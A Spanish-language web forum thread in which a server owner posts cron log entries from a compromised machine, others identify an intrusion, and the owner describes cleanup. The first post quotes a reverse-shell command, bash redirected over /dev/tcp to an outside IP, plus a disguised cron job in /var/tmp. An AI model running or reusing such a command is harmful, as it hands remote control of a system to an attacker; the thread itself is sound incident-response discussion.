Foros del Web » Administración de Sistemas » Software para Servers »

servidor inestable

Estas en el tema de servidor inestable en el foro de Software para Servers en Foros del Web. el servidor esta continuamente cayéndose estoy faroleando los logs y aparte de que tiene una actividad frénetica de correos que parece ser que me mando ...
  #1 (permalink)  
Antiguo 26/05/2013, 20:19
Avatar de juanito1712  
Fecha de Ingreso: mayo-2010
Ubicación: Valencia
Mensajes: 1.124
Antigüedad: 14 años, 6 meses
Puntos: 66
servidor inestable

el servidor esta continuamente cayéndose estoy faroleando los logs y aparte de que tiene una actividad frénetica de correos que parece ser que me mando entre cuentas de correo de mis dominios que no existen he visto esto

May 27 04:13:01 vds-854045 /USR/SBIN/CRON[19459]: (psaadm) CMD (/var/tmp/pdflush >/dev/null 2>&1)
May 27 04:13:01 vds-854045 /USR/SBIN/CRON[19461]: (root) CMD (/bin/bash -i > /dev/tcp/208.84.200.14/443 0<&1 2>

alguien sabria decirme que hace eso?
  #2 (permalink)  
Antiguo 31/05/2013, 04:54
 
Fecha de Ingreso: octubre-2012
Ubicación: Madrid
Mensajes: 87
Antigüedad: 12 años, 1 mes
Puntos: 6
Respuesta: servidor inestable

Ponte en contacto con tu empresa de hosting y que te echen una mano, parece que tienes algún problema de ataque o vulnerabilidad.

Suerte!
__________________
- Digital Valley - Servidores Dedicados, VPS, Cloud Hosting, Alojamiento Web, Wordpress.
  #3 (permalink)  
Antiguo 31/05/2013, 07:18
Avatar de Datacenter1
Usuario no validado
 
Fecha de Ingreso: agosto-2005
Ubicación: Chicago
Mensajes: 1.982
Antigüedad: 19 años, 3 meses
Puntos: 144
Respuesta: servidor inestable

un atacante remoto (208.84.200.14) está redireccionando una consola a su pc

Extremadamente grave, sugiero que de inmediato contactes a tu proveedor o algún experto que pueda prestarte ayuda
  #4 (permalink)  
Antiguo 02/06/2013, 21:06
Avatar de juanito1712  
Fecha de Ingreso: mayo-2010
Ubicación: Valencia
Mensajes: 1.124
Antigüedad: 14 años, 6 meses
Puntos: 66
Respuesta: servidor inestable

he eliminado el cron, creado un nuevo usuario estandar, desactivado el usuario root y he retirado todo el php que creo que fue el culpable y todos los archivos editados desde la fecha que subí aquellos al servidor...

echándole un vistazo a los logs ya no parece que se ejecute absolutamente nada que no esperaba que se ejecutase desde hace una semana y tampoco he visto ningún login inesperado en esta semana.

esto está bien así o debería comprobar algo mas?

Etiquetas: inestable, servidor, servidores-web
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 14:30.